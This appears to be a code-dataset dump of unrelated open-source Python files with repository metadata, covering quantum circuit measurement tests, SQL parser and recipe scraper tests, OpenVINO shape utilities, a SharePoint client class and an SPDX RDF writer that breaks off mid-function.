def test_measurement_compiled_circuit(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.M(0))
c.add(gates.M(1))
c.compile(backend)
result = c(nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 0] = 1
assert_result(
backend,
result,
2 * np.ones((100,)),
target_binary_samples,
{2: 100},
{"10": 100},
)
target_state = np.zeros_like(c.final_state)
target_state[2] = 1
backend.assert_allclose(c.final_state, target_state)
def test_final_state(backend, accelerators):
"""Check that final state is logged correctly when using measurements."""
c = models.Circuit(4, accelerators)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.M(0, 1))
c.add(gates.M(2))
c.add(gates.X(3))
result = backend.execute_circuit(c, nshots=100)
c = models.Circuit(4, accelerators)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.X(3))
target_state = backend.execute_circuit(c)
backend.assert_allclose(c.final_state, target_state)
def test_measurement_gate_bitflip_errors():
gate = gates.M(0, 1, p0=2 * [0.1])
with pytest.raises(ValueError):
gate = gates.M(0, 1, p0=4 * [0.1])
with pytest.raises(KeyError):
gate = gates.M(0, 1, p0={0: 0.1, 2: 0.2})
with pytest.raises(TypeError):
gate = gates.M(0, 1, p0="test")
def test_register_measurements(backend):
c = models.Circuit(3)
c.add(gates.X(0))
c.add(gates.X(1))
c.add(gates.M(0, 2))
c.add(gates.M(1))
result = backend.execute_circuit(c, nshots=100)
decimal_samples = {"register0": 2 * np.ones((100,)), "register1": np.ones((100,))}
binary_samples = {"register0": np.zeros((100, 2)), "register1": np.ones((100, 1))}
binary_samples["register0"][:, 0] = 1
decimal_frequencies = {"register0": {2: 100}, "register1": {1: 100}}
binary_frequencies = {"register0": {"10": 100}, "register1": {"1": 100}}
assert_register_result(
backend,
result,
decimal_samples,
binary_samples,
decimal_frequencies,
binary_frequencies,
)
def test_register_name_error(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.M(0, register_name="a"))
with pytest.raises(KeyError):
c.add(gates.M(1, register_name="a"))
def test_registers_with_same_name_error(backend):
"""Check that circuits that contain registers with the same name cannot be added."""
c1 = models.Circuit(2)
c1.add(gates.H(0))
c1.add(gates.M(0, register_name="a"))
c2 = models.Circuit(2)
c2.add(gates.H(1))
c2.add(gates.M(1, register_name="a"))
with pytest.raises(KeyError):
c = c1 + c2
def test_measurement_qubit_order_multiple_registers(backend, accelerators):
c = models.Circuit(6, accelerators)
c.add(gates.X(0))
c.add(gates.X(1))
c.add(gates.X(3))
c.add(gates.M(5, 1, 3, register_name="a"))
c.add(gates.M(2, 0, register_name="b"))
result = backend.execute_circuit(c, nshots=100)
# Check full result
target_binary_samples = np.zeros((100, 5))
target_binary_samples[:, 1] = 1
target_binary_samples[:, 2] = 1
target_binary_samples[:, 4] = 1
assert_result(
backend,
result,
13 * np.ones((100,)),
target_binary_samples,
{13: 100},
{"01101": 100},
)
decimal_samples = {"a": 3 * np.ones((100,)), "b": np.ones((100,))}
binary_samples = {"a": np.zeros((100, 3)), "b": np.zeros((100, 2))}
binary_samples["a"][:, 1] = 1
binary_samples["a"][:, 2] = 1
binary_samples["b"][:, 1] = 1
decimal_frequencies = {"a": {3: 100}, "b": {1: 100}}
binary_frequencies = {"a": {"011": 100}, "b": {"01": 100}}
assert_register_result(
backend,
result,
decimal_samples,
binary_samples,
decimal_frequencies,
binary_frequencies,
)
def test_registers_in_circuit_with_unmeasured_qubits(backend, accelerators):
"""Check that register measurements are unaffected by unmeasured qubits."""
c = models.Circuit(5, accelerators)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.M(0, 2, register_name="A"))
c.add(gates.X(3))
c.add(gates.M(1, 4, register_name="B"))
result = backend.execute_circuit(c, nshots=100)
target = {}
decimal_samples = {"A": np.ones((100,)), "B": 2 * np.ones((100,))}
binary_samples = {"A": np.zeros((100, 2)), "B": np.zeros((100, 2))}
binary_samples["A"][:, 1] = 1
binary_samples["B"][:, 0] = 1
decimal_frequencies = {"A": {1: 100}, "B": {2: 100}}
binary_frequencies = {"A": {"01": 100}, "B": {"10": 100}}
assert_register_result(
backend,
result,
decimal_samples,
binary_samples,
decimal_frequencies,
binary_frequencies,
)
def test_measurement_density_matrix(backend):
c = models.Circuit(2, density_matrix=True)
c.add(gates.X(0))
c.add(gates.M(0, 1))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 0] = 1
assert_result(
backend,
result,
decimal_samples=2 * np.ones((100,)),
binary_samples=target_binary_samples,
decimal_frequencies={2: 100},
binary_frequencies={"10": 100},
)
def test_measurement_result_vs_circuit_result(backend, accelerators):
c = models.Circuit(6, accelerators)
c.add([gates.X(0), gates.X(1), gates.X(3)])
ma = c.add(gates.M(5, 1, 3, register_name="a"))
mb = c.add(gates.M(2, 0, register_name="b"))
result = backend.execute_circuit(c, nshots=100)
ma_freq = ma.frequencies()
mb_freq = mb.frequencies()
frequencies = result.frequencies(registers=True)
assert ma_freq == frequencies.get("a")
assert mb_freq == frequencies.get("b")
@pytest.mark.parametrize("nqubits", [1, 4])
@pytest.mark.parametrize("outcome", [0, 1])
def test_measurement_basis(backend, nqubits, outcome):
c = models.Circuit(nqubits)
if outcome:
c.add(gates.X(q) for q in range(nqubits))
c.add(gates.H(q) for q in range(nqubits))
c.add(gates.M(*range(nqubits), basis=gates.X))
result = c(nshots=100)
assert result.frequencies() == {nqubits * str(outcome): 100}
def test_measurement_basis_list(backend):
c = models.Circuit(4)
c.add(gates.H(0))
c.add(gates.X(2))
c.add(gates.H(2))
c.add(gates.X(3))
c.add(gates.M(0, 1, 2, 3, basis=[gates.X, gates.Z, gates.X, gates.Z]))
result = c(nshots=100)
assert result.frequencies() == {"0011": 100}
print(c.draw())
assert (
c.draw()
== """q0: ─H─H───M─
q1: ───────M─
q2: ─X─H─H─M─
q3: ─X─────M─"""
)
def test_measurement_basis_list_error(backend):
c = models.Circuit(4)
with pytest.raises(ValueError):
c.add(gates.M(0, 1, 2, 3, basis=[gates.X, gates.Z, gates.X]))
|
82ef5d5f3f177cf663ef075eaa9e689d442639cc
|
e90bf4b372da78ceec15282d060b48d18ba8d4e9
|
/tests/test_core.py
|
8e25bac68d0f359168091bb6963a2c55404d12a4
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/supervisor
|
67f2e1755ff5fbf7cf2084351e1c32c6995274e0
|
4838b280adafed0997f32e021274b531178386cd
|
refs/heads/main
| 2023-08-31T22:51:25.949277
| 2023-08-31T08:01:42
| 2023-08-31T08:01:42
| 84,926,758
| 928
| 477
|
Apache-2.0
| 2023-09-14T17:11:27
| 2017-03-14T08:54:15
|
Python
|
UTF-8
|
Python
| false
| false
| 428
|
py
|
test_core.py
|
"""Testing handling with CoreState."""
from supervisor.const import CoreState
from supervisor.coresys import CoreSys
def test_write_state(run_dir, coresys: CoreSys):
"""Test write corestate to /run/supervisor."""
coresys.core.state = CoreState.RUNNING
assert run_dir.read_text() == CoreState.RUNNING.value
coresys.core.state = CoreState.SHUTDOWN
assert run_dir.read_text() == CoreState.SHUTDOWN.value
|
3f104056f614663d6f8439b75d490e39c4c88113
|
8ca19f1a31070738b376c0370c4bebf6b7efcb43
|
/office365/sharepoint/features/collection.py
|
b09731e105ae87c2c482cea609221fd456e26269
|
[
"MIT"
] |
permissive
|
vgrem/Office365-REST-Python-Client
|
2ef153d737c6ed5445ba1e446aeaec39c4ef4ed3
|
cbd245d1af8d69e013c469cfc2a9851f51c91417
|
refs/heads/master
| 2023-09-02T14:20:40.109462
| 2023-08-31T19:14:05
| 2023-08-31T19:14:05
| 51,305,798
| 1,006
| 326
|
MIT
| 2023-08-28T05:38:02
| 2016-02-08T15:24:51
|
Python
|
UTF-8
|
Python
| false
| false
| 2,319
|
py
|
collection.py
|
from office365.runtime.paths.service_operation import ServiceOperationPath
from office365.runtime.queries.service_operation import ServiceOperationQuery
from office365.sharepoint.base_entity_collection import BaseEntityCollection
from office365.sharepoint.features.feature import Feature
class FeatureCollection(BaseEntityCollection):
"""Represents a collection of Feature resources."""
def __init__(self, context, resource_path=None, parent=None):
super(FeatureCollection, self).__init__(context, Feature, resource_path, parent)
def add(self, feature_id, force, featdef_scope, verify_if_activated=False):
"""
Adds the feature to the collection of activated features and returns the added feature.
:param str feature_id: The feature identifier of the feature to be added.
:param bool force: Specifies whether to continue with the operation even if there are errors.
:param int featdef_scope: The feature scope for this feature.
:param bool verify_if_activated: Verify if activated first to avoid System.Data.DuplicateNameException exception
"""
return_type = Feature(self.context)
self.add_child(return_type)
def _create_query():
payload = {
"featureId": feature_id,
"force": force,
"featdefScope": featdef_scope
}
return ServiceOperationQuery(self, "Add", None, payload, None, return_type)
def _create_if_not_activated(f):
"""
:type f: Feature
"""
if not f.properties:
self.context.add_query(_create_query())
if verify_if_activated:
feature = self.get_by_id(feature_id)
self.context.load(feature, after_loaded=_create_if_not_activated)
else:
self.context.add_query(_create_query())
return return_type
def get_by_id(self, feature_id):
"""Returns the feature for the given feature identifier. Returns NULL if no feature is available for the given
feature identifier.
:param str feature_id: The feature identifier of the feature to be returned.
"""
return Feature(self.context, ServiceOperationPath("GetById", [feature_id], self.resource_path))
|
24aa109ee9c6a49aa85c7f96e347ffb4dfd8d9e8
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/20_杂题/滴滴历届编程题真题/18_重复字符串重命名-counter.py
|
73f026b46d31bd2eeea48bc922578ecdb8f34d42
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
18_重复字符串重命名-counter.py
|
from collections import Counter
chars = input().split(",")
counter = Counter()
res = []
for char in chars:
if char in counter:
res.append(f"{char}_{counter[char] - 1}")
counter[char] += 1
else:
res.append(char)
counter[char] = 1
print(res)
|
86e467b2314d0a54c542a3e19c3f4041499c5cb8
|
73bf31d04b9ad66a7649c7786cdbf50c06cf46e2
|
/tests/gen-installed-test.py
|
32887b5e24d7c11d7995805bf1af5c40e9fb0d64
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ebassi/graphene
|
b137ca6ab3faeca9f86a3c36284f5e49bad1e3ee
|
0cfa05ff62f244e4d5e7ac35a1979a23f25c5151
|
refs/heads/master
| 2023-09-01T01:38:46.767165
| 2023-08-10T14:47:59
| 2023-08-10T14:47:59
| 19,352,997
| 341
| 87
|
MIT
| 2023-08-19T23:22:24
| 2014-05-01T18:07:32
|
C
|
UTF-8
|
Python
| false
| false
| 2,027
|
py
|
gen-installed-test.py
|
#!/usr/bin/env python3
# Copyright 2017 Emmanuele Bassi
#
# SPDX-License-Identifier: MIT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import os
import argparse
def write_template(filename, data):
with open(filename, 'w') as f:
f.write(data)
def build_template(testdir, testname):
return """[Test]
Type=session
Exec={}
TestEnvironment=MUTEST_OUTPUT=tap;
""".format(os.path.join(testdir, testname))
argparser = argparse.ArgumentParser(description='Generate installed-test data.')
argparser.add_argument('--testdir', metavar='dir', required=True, help='Installed test directory')
argparser.add_argument('--testname', metavar='name', required=True, help='Installed test name')
argparser.add_argument('--outfile', metavar='file', required=True, help='Output file')
argparser.add_argument('--outdir', metavar='dir', required=True, help='Output directory')
args = argparser.parse_args()
write_template(os.path.join(args.outdir, args.outfile), build_template(args.testdir, args.testname))
|
3e9c11fe7bc740b612a354e31b707b41fb7ccf71
|
db732c7e4477c8e4dc725038d8712022c5bcf449
|
/test/test_postgress.py
|
d2c8ebbd6bb673e44cf7a80f948224460484ed3f
|
[
"MIT"
] |
permissive
|
macbre/sql-metadata
|
e30a177b5250ef0e9145b13246e1958f6914a98a
|
6507b8111b3c9d14414f3e42e7107e6558fa47c2
|
refs/heads/master
| 2023-08-18T00:22:20.118438
| 2023-08-07T02:10:12
| 2023-08-07T02:10:12
| 93,537,184
| 603
| 104
|
MIT
| 2023-09-13T07:15:43
| 2017-06-06T15:59:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
test_postgress.py
|
from sql_metadata import Parser
def test_postgress_quoted_names():
# https://github.com/macbre/sql-metadata/issues/85
parser = Parser(
'INSERT INTO "test" ("name") VALUES (\'foo\') RETURNING "test"."id"'
)
assert ["test"] == parser.tables
assert ["name"] == parser.columns
assert {"insert": ["name"]} == parser.columns_dict
assert "INSERT INTO test (name) VALUES (X) RETURNING test.id" == parser.generalize
assert parser.values == ["foo"]
parser = Parser(
'SELECT "test"."id", "test"."name" FROM "test" '
'WHERE "test"."name" = \'foo\' LIMIT 21 FOR UPDATE'
)
assert ["test"] == parser.tables
assert ["test.id", "test.name"] == parser.columns
assert {
"select": ["test.id", "test.name"],
"where": ["test.name"],
} == parser.columns_dict
assert (
"SELECT test.id, test.name FROM test WHERE test.name = X LIMIT N FOR UPDATE"
== parser.generalize
)
parser = Parser('UPDATE "test" SET "name" = \'bar\' WHERE "test"."id" = 1')
assert ["test"] == parser.tables
assert ["name", "test.id"] == parser.columns
assert {"update": ["name"], "where": ["test.id"]} == parser.columns_dict
assert "UPDATE test SET name = X WHERE test.id = N" == parser.generalize
|
0374a4b098efe0abd0f38086db514e3141fda7ce
|
c2c212ba42ebfa35f3b6122344978bc94ec8fa67
|
/tests/test_spendwithpennies.py
|
23d6e3b99019ecff2a4169d1e330badd28cfde71
|
[
"MIT"
] |
permissive
|
hhursev/recipe-scrapers
|
0cd6b7db4ef23ca825f2354f5d1ba76076a14813
|
8ced0227b3b16c532fc5ebf3060c99ee0452adab
|
refs/heads/main
| 2023-09-03T07:33:29.684121
| 2023-09-01T21:15:50
| 2023-09-01T21:15:50
| 42,446,168
| 1,276
| 443
|
MIT
| 2023-09-14T16:34:09
| 2015-09-14T12:05:00
|
Python
|
UTF-8
|
Python
| false
| false
| 2,383
|
py
|
test_spendwithpennies.py
|
from recipe_scrapers.spendwithpennies import SpendWithPennies
from tests import ScraperTest
class TestSpendWithPenniesScraper(ScraperTest):
scraper_class = SpendWithPennies
def test_host(self):
self.assertEqual("spendwithpennies.com", self.harvester_class.host())
def test_canonical_url(self):
self.assertEqual(
"https://www.spendwithpennies.com/gooey-chocolate-pudding-cake/",
self.harvester_class.canonical_url(),
)
def test_title(self):
self.assertEqual(self.harvester_class.title(), "Gooey Chocolate Pudding Cake")
def test_author(self):
self.assertEqual(self.harvester_class.author(), "Holly Nilsson")
def test_total_time(self):
self.assertEqual(35, self.harvester_class.total_time())
def test_yields(self):
self.assertEqual("6 servings", self.harvester_class.yields())
def test_image(self):
self.assertEqual(
"https://www.spendwithpennies.com/wp-content/uploads/2013/10/Chocolate-Pudding-Cake-SpendWithPennies-B-4.jpg",
self.harvester_class.image(),
)
def test_ingredients(self):
self.assertEqual(
[
"¾ cup all-purpose flour",
"½ cup sugar",
"½ cup unsweetened cocoa powder",
"1 ½ teaspoons baking powder",
"⅔ cup milk",
"2 tablespoons vegetable oil",
"1 teaspoon vanilla",
"⅔ cup brown sugar (packed)",
"¼ cup cocoa powder",
"¼ cup miniature semisweet chocolate chips",
"1 ¼ cups very hot water",
],
self.harvester_class.ingredients(),
)
def test_instructions(self):
return self.assertEqual(
"Preheat oven to 350°F.\nIn a 2 qt casserole dish, combine flour, white sugar, cocoa powder, and baking powder.\nAdd milk and oil, and vanilla. Stir until well mixed.\nIn a small bowl, combine brown sugar, cocoa powder and chocolate chips. Sprinkle over cake batter. DO NOT STIR. Pour hot water over top.\nBake for 30-35 minutes or until the top looks cooked. Serve warm (with ice cream if desired).",
self.harvester_class.instructions(),
)
def test_ratings(self):
self.assertEqual(4.9, self.harvester_class.ratings())
|
08ffb8e22972f18ea55bcc7cbea89d7b6b3aec4b
|
2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5
|
/tools/mo/unit_tests/mo/front/common/partial_infer/utils_test.py
|
b6fc90204ac42ce710aaf3a2125ca27f8850d96d
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/openvino
|
38ea745a247887a4e14580dbc9fc68005e2149f9
|
e4bed7a31c9f00d8afbfcabee3f64f55496ae56a
|
refs/heads/master
| 2023-08-18T03:47:44.572979
| 2023-08-17T21:24:59
| 2023-08-17T21:24:59
| 153,097,643
| 3,953
| 1,492
|
Apache-2.0
| 2023-09-14T21:42:24
| 2018-10-15T10:54:40
|
C++
|
UTF-8
|
Python
| false
| false
| 9,007
|
py
|
utils_test.py
|
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from generator import generator, generate
from openvino.tools.mo.front.common.partial_infer.utils import int64_array, mo_array, is_fully_defined, \
dynamic_dimension_value, dynamic_dimension, shape_array, compatible_shapes, shape_delete, shape_insert, \
strict_compare_tensors, clarify_partial_shape
from openvino.tools.mo.utils.error import Error
def gen_masked_array(array, masked_indices):
"""
Creates a masked array from the input array by masking specific elements.
:param array: the input array
:param masked_indices: element indices to be masked
:return: the result masked array
"""
res = np.ma.masked_array(array)
for index in masked_indices:
res[index] = np.ma.masked
return res
@generator
class IsFullyDefinedTest(unittest.TestCase):
@generate(*[(None, False),
(int64_array([2, 3, 5, 7]), True), # int64 array with valid values
(np.array([2, 3, 5, 7]), True), # any numpy array with valid values
(np.array([2, dynamic_dimension_value]), True), # array with dynamic dimension value is fully defined!
(shape_array([2, dynamic_dimension_value, 5]), False), # masked array with at least one masked element
(shape_array([2, 4, 5]), True), # masked array with no masked elements is fully defined
(dynamic_dimension, False), # dynamic dimension is not fully defined
(dynamic_dimension_value, True), # dynamic dimension value is fully defined
((dynamic_dimension_value, dynamic_dimension_value), True), # list with dynamic dimension values is
# fully defined
((dynamic_dimension, 1), False), # tuple with dynamic dimension is not fully defined
([dynamic_dimension, 1], False), # list with dynamic dimension is not fully defined
])
def test_is_fully_defined(self, data, result):
self.assertEqual(is_fully_defined(data), result)
@generator
class ShapeArrayTest(unittest.TestCase):
@generate(*[([1], shape_array([1]), True),
# if we provide a list with dynamic_dimension_value then it is converted to dynamic dimension
([dynamic_dimension_value, 5], gen_masked_array([1, 5], [0]), True),
# if we provide a list with dynamic_dimension then the generated shape array still have it
([7, dynamic_dimension], gen_masked_array([7, 1], [1]), True),
# negative test to make sure that np.ma.allequal works properly
([2], gen_masked_array([1], []), False),
])
def test_shape_array(self, data, ref, result):
self.assertEqual(strict_compare_tensors(shape_array(data), ref), result)
@generator
class CompareShapesTest(unittest.TestCase):
@generate(*[(gen_masked_array([1, 2, 3], []), gen_masked_array([1, 2, 3], []), True),
(gen_masked_array([4, 2, 3], []), gen_masked_array([1, 2, 3], []), False),
(gen_masked_array([1, 2], []), gen_masked_array([1, 2, 3], []), False),
(gen_masked_array([1, 2, 3], []), gen_masked_array([1, 2], []), False),
(gen_masked_array([1, 2, 3], [1]), gen_masked_array([1, 5, 3], [1]), True), # [1, d, 3] vs [1, d, 3]
(gen_masked_array([1, 2, 3], [2]), gen_masked_array([1, 5, 3], [1]), True), # [1, 2, d] vs [1, d, 3]
(gen_masked_array([1, 2, 3], []), gen_masked_array([1, 5, 3], [1]), True), # [1, 2, 3] vs [1, d, 3]
(gen_masked_array([1, 2, 3], [0]), gen_masked_array([1, 5, 3], []), False), # [d, 2, 3] vs [1, 5, 3]
(np.array([1, 2, 3]), gen_masked_array([1, 5, 3], [1]), True), # [1, 2, 3] vs [1, d, 3]
(np.array([1, 2]), gen_masked_array([1, 5, 3], [1]), False),
(np.array([1, 2]), np.array([1, 2]), True),
(np.array([1, 2]), np.array([3, 2]), False),
])
def test_compare_shapes(self, input1, input2, result):
self.assertEqual(compatible_shapes(input1, input2), result)
@generator
class ShapeDeleteTest(unittest.TestCase):
@generate(*[(gen_masked_array([1, 2, 3], []), [], gen_masked_array([1, 2, 3], [])),
# [1, d, 3] -> [d, 3]. Indices input is a list
(gen_masked_array([1, 2, 3], [1]), [0], gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is a numpy array
(gen_masked_array([1, 2, 3], [1]), np.array([0]), gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is a masked array
(gen_masked_array([1, 2, 3], [1]), gen_masked_array([0], []), gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is a numpy array with scalar
(gen_masked_array([1, 2, 3], [1]), np.array(0), gen_masked_array([2, 3], [0])),
# [1, d, 3] -> [d, 3]. Indices input is an integer
(gen_masked_array([1, 2, 3], [1]), 0, gen_masked_array([2, 3], [0])), # [1, d, 3] -> [d, 3]
(gen_masked_array([1, 2, 3, 4], [1]), [0, 2], gen_masked_array([2, 4], [0])), # [1, d, 3, 4] -> [d, 4]
(gen_masked_array([1, 2, 3], [1]), [0, 2, 1], gen_masked_array([], [])), # [1, d, 3] -> []
(gen_masked_array([1, 2, 3], [1]), [0, 2], gen_masked_array([2], [0])), # [1, d, 3] -> [d]
# [1, d, d, 4] -> [d, d]
(gen_masked_array([1, 2, 3, 4], [1, 2]), [3, 0], gen_masked_array([2, 3], [0, 1])),
(gen_masked_array([1, 2, 3, 4], [2]), 3, gen_masked_array([1, 2, 3], [2])), # [1, 2, d, 4] -> [1, 2, d]
([1, 2, 3, 4], [1], [1, 3, 4]), # [1, 2, 3, 4] -> [1, 3, 4]. Input is a regular lists
(np.array([1, 2, 3, 4]), [1], [1, 3, 4]), # [1, 2, 3, 4] -> [1, 3, 4]. Input is a regular arrays
(np.array([1, 2, 3, 4]), [-1, -3], [1, 3]), # [1, 2, 3, 4] -> [1, 3]. Negative indices
(np.array([1, 2, 3, 4]), -2, [1, 2, 4]), # [1, 2, 3, 4] -> [1, 2, 4]. Negative index
])
def test_shape_delete(self, shape, indices, result):
self.assertTrue(strict_compare_tensors(shape_delete(shape, indices), result))
def test_shape_delete_raise_exception(self):
with self.assertRaisesRegex(Error, '.*Incorrect parameter type.*'):
shape_delete(gen_masked_array([1, 2, 3], []), {})
@generator
class ShapeInsertTest(unittest.TestCase):
@generate(*[(gen_masked_array([1, 2, 3], []), 1, [5], gen_masked_array([1, 5, 2, 3], [])),
(gen_masked_array([1, 2, 3], [1]), 1, [5], gen_masked_array([1, 5, 2, 3], [2])),
(gen_masked_array([1, 2, 3], [1]), 1, [dynamic_dimension], gen_masked_array([1, 5, 2, 3], [1, 2])),
(gen_masked_array([1, 2, 3], [1]), 0, [dynamic_dimension], gen_masked_array([5, 1, 2, 3], [0, 2])),
(gen_masked_array([1, 2, 3], [1]), np.int64(0), [dynamic_dimension],
gen_masked_array([5, 1, 2, 3], [0, 2])),
(gen_masked_array([1, 2, 3], [1]), 3, [dynamic_dimension], gen_masked_array([1, 2, 3, 5], [1, 3])),
(gen_masked_array([1, 2, 3], [1]), 3, [dynamic_dimension, dynamic_dimension],
gen_masked_array([1, 2, 3, 5, 6], [1, 3, 4])),
(gen_masked_array([1], [0]), 0, [7, dynamic_dimension], gen_masked_array([7, 5, 2], [1, 2])),
])
def test_shape_insert(self, shape, pos, values, result):
self.assertTrue(strict_compare_tensors(shape_insert(shape, pos, values), result))
def test_shape_insert_raise_exception(self):
with self.assertRaisesRegex(Error, '.*Incorrect parameter type.*'):
shape_insert(gen_masked_array([1, 2, 3], []), 2, {})
@generator
class mo_array_test(unittest.TestCase):
@generate(*[(mo_array([2, 3, 5, 7]), np.array([2, 3, 5, 7])),
(mo_array([2., 3., 5., 7.], dtype=np.float64), np.array([2., 3., 5., 7.])),
(mo_array([2., 3., 5., 7.]), np.array([2., 3., 5., 7.], dtype=np.float32)),
])
def test_mo_array_positive(self, data, result):
self.assertEqual(data.dtype, result.dtype)
@generate(*[(mo_array([2., 3., 5., 7.]), np.array([2., 3., 5., 7.])),
])
def test_mo_array_negative(self, data, result):
self.assertNotEqual(data.dtype, result.dtype)
class clarify_partial_shape_test(unittest.TestCase):
def test_clarify_1(self):
actual_result = clarify_partial_shape([shape_array([dynamic_dimension, 10, dynamic_dimension]),
shape_array([4, dynamic_dimension, dynamic_dimension])])
ref_result = shape_array([4, 10, dynamic_dimension])
assert strict_compare_tensors(actual_result, ref_result)
|
f8f55732146f845ddb672eec0603ac04fe0ad799
|
bfc42c114f652012b6cfd14e7cccf52cb6b9ac7e
|
/src/spdx_tools/spdx/writer/rdf/package_writer.py
|
2137d0dbd286b1b788a41716766df24469facd57
|
[
"Apache-2.0",
"GPL-2.0-only"
] |
permissive
|
spdx/tools-python
|
05a952501af2ac608678cb1737f7c661f6091fa2
|
777bd274dd06cb24342738df7da5ab285d652350
|
refs/heads/main
| 2023-08-31T09:39:52.930063
| 2023-08-24T06:39:48
| 2023-08-24T10:22:33
| 32,761,058
| 147
| 136
|
Apache-2.0
| 2023-09-14T15:50:59
| 2015-03-23T21:54:39
|
Python
|
UTF-8
|
Python
| false
| false
| 6,545
|
py
|
package_writer.py
|
# SPDX-FileCopyrightText: 2023 spdx contributors
#
# SPDX-License-Identifier: Apache-2.0
from beartype.typing import Dict
from rdflib import DOAP, RDF, RDFS, XSD, BNode, Graph, Literal, URIRef
from spdx_tools.spdx.casing_tools import snake_case_to_camel_case
from spdx_tools.spdx.model import ExternalPackageRef, Package, PackageVerificationCode
from spdx_tools.spdx.model.package import CATEGORY_TO_EXTERNAL_PACKAGE_REF_TYPES
from spdx_tools.spdx.rdfschema.namespace import REFERENCE_NAMESPACE, SPDX_NAMESPACE
from spdx_tools.spdx.writer.rdf.checksum_writer import add_checksum_to_graph
from spdx_tools.spdx.writer.rdf.license_expression_writer import add_license_expression_or_none_or_no_assertion
from spdx_tools.spdx.writer.rdf.writer_utils import (
add_datetime_to_graph,
add_literal_or_no_assertion_or_none,
add_namespace_to_spdx_id,
add_optional_literal,
)
def add_package_to_graph(
package: Package, graph: Graph, doc_namespace: str, external_doc_ref_to_namespace: Dict[str, str]
):
package_resource = URIRef(add_namespace_to_spdx_id(package.spdx_id, doc_namespace, external_doc_ref_to_namespace))
graph.add((package_resource, RDF.type, SPDX_NAMESPACE.Package))
graph.add((package_resource, SPDX_NAMESPACE.name, Literal(package.name)))
add_optional_literal(package.version, graph, package_resource, SPDX_NAMESPACE.versionInfo)
add_optional_literal(package.file_name, graph, package_resource, SPDX_NAMESPACE.packageFileName)
add_optional_literal(package.supplier, graph, package_resource, SPDX_NAMESPACE.supplier)
add_optional_literal(package.originator, graph, package_resource, SPDX_NAMESPACE.originator)
add_literal_or_no_assertion_or_none(
package.download_location, graph, package_resource, SPDX_NAMESPACE.downloadLocation
)
graph.add((package_resource, SPDX_NAMESPACE.filesAnalyzed, Literal(package.files_analyzed, datatype=XSD.boolean)))
add_package_verification_code_to_graph(package.verification_code, graph, package_resource)
for checksum in package.checksums:
add_checksum_to_graph(checksum, graph, package_resource)
add_optional_literal(package.homepage, graph, package_resource, DOAP.homepage)
add_optional_literal(package.source_info, graph, package_resource, SPDX_NAMESPACE.sourceInfo)
add_license_expression_or_none_or_no_assertion(
package.license_concluded, graph, package_resource, SPDX_NAMESPACE.licenseConcluded, doc_namespace
)
add_license_expression_or_none_or_no_assertion(
package.license_info_from_files, graph, package_resource, SPDX_NAMESPACE.licenseInfoFromFiles, doc_namespace
)
add_license_expression_or_none_or_no_assertion(
package.license_declared, graph, package_resource, SPDX_NAMESPACE.licenseDeclared, doc_namespace
)
add_optional_literal(package.license_comment, graph, package_resource, SPDX_NAMESPACE.licenseComments)
add_optional_literal(package.copyright_text, graph, package_resource, SPDX_NAMESPACE.copyrightText)
add_optional_literal(package.summary, graph, package_resource, SPDX_NAMESPACE.summary)
add_optional_literal(package.description, graph, package_resource, SPDX_NAMESPACE.description)
add_optional_literal(package.comment, graph, package_resource, RDFS.comment)
for external_reference in package.external_references:
add_external_package_ref_to_graph(external_reference, graph, package_resource, doc_namespace)
for attribution_text in package.attribution_texts:
add_optional_literal(attribution_text, graph, package_resource, SPDX_NAMESPACE.attributionText)
if package.primary_package_purpose:
graph.add(
(
package_resource,
SPDX_NAMESPACE.primaryPackagePurpose,
SPDX_NAMESPACE[f"purpose_{snake_case_to_camel_case(package.primary_package_purpose.name)}"],
)
)
add_datetime_to_graph(package.release_date, graph, package_resource, SPDX_NAMESPACE.releaseDate)
add_datetime_to_graph(package.built_date, graph, package_resource, SPDX_NAMESPACE.builtDate)
add_datetime_to_graph(package.valid_until_date, graph, package_resource, SPDX_NAMESPACE.validUntilDate)
def add_package_verification_code_to_graph(
package_verification_code: PackageVerificationCode, graph: Graph, package_node: URIRef
):
if not package_verification_code:
return
package_verification_code_node = BNode()
graph.add((package_verification_code_node, RDF.type, SPDX_NAMESPACE.PackageVerificationCode))
graph.add(
